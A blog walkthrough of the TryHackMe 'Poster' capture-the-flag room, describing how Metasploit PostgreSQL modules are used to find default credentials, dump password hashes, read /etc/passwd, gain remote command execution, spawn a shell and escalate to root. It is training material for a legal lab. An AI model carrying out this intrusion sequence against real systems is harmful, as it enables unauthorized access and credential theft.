Swafox Blog
  • Home
  • Resources
  • linux
    • Microsoft Office on Linux
    • Vim
    • How to set up an unlimited secure VPN server for 5$/month
  • Exploit Development / BoF
    • Pwntools
    • Buffer Overflows
  • Ethical Hacking & Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • XXE
    • CVE-2020-5902
    • Google XSS
    • Identifying IP via Email
    • OWASP ZAP
    • Server-side request forgery (SSRF)
  • Write-ups
    • TryHackMe - OWASP Top 10 Event
    • TryHackMe - Anthem
    • TryHackMe - Blog
    • TryHackMe - Poster
    • HTB - Traceback: User flag Walkthrough
    • TryHackMe - Tomghost
Powered by GitBook
On this page
  1. Write-ups

TryHackMe - Poster

PreviousTryHackMe - BlogNextHTB - Traceback: User flag Walkthrough

Last updated 2 years ago

Room Link: <https://tryhackme.com/room/poster>

Introduction

RDBMS - relational database management system. RDBMSs have been a common option for the storage of information in databases used for financial records, manufacturing and logistical information, personnel data, and other applications since the 1980s. Relational databases have often replaced legacy hierarchical databases and network databases, because RDBMS were easier to implement and administer.

PostgreSQL is a free and open-source relational database management system (RDBMS) emphasizing extensibility and SQL compliance.

Recon

First, add poster.thm to your /etc/hosts file for ease of operation.

From the scan above we can easily identify both port (Q2) and the rdms name (Q1).

Metasploit Enumaration

Launch metasploit and search for postgresql-related modules using:

search postgresql

First of all, let's look at the login module. It check the rdbms for weak/standard login credentials and allows us to get initial access.

auxiliary/scanner/postgres/postgres_login

Bingo! We got the credentials. Now we can use them to dump password hashes, read files and achieve an RCE.

Let's dump password hashes using another module

auxiliary/scanner/postgres/postgres_hashdump

Don't forget to plug both username and password into the module.

Metasploit Exploitation

auxiliary/admin/postgres/postgres_readfile

Let's use this module to read the contents of /etc/passwd file to get some initial information about the machine.

After reading the /etc/passwd file we have a direct clue about all user accounts on the box.

Now it's time to finally get the box access and escalate our priviliges.

exploit/multi/postgres/postgres_copy_from_program_cmd_exec

Above module will allow you to achieve RCE on the system using just the RDBMS username and password.

Once the command was executed, use python3 -c 'import pty; pty.spawn("/bin/bash")' to get a tty shell.

Remember, while reading the /etc/passwd file, we have identified one user? Take a look at his home directory at retrieve credentials.

Once on the system, we may notice that the user cannot run any commands as sudo which usually indicates that we need to find something ourselves.

Turns out there was a conf file in the /var/html/www that contained both username and password for out last step of privilege escalation. Read it and login as the new user.

Root

After getting on the second account, it becomes relatively easy to escalate your privileges.

sudo -l

From this point, execute sudo su and get the root access :)

Thank you for reading!

As always, start with the simple scan.

It is important to set a proper payload for this payload

Black: Credentials; White: User

RustScan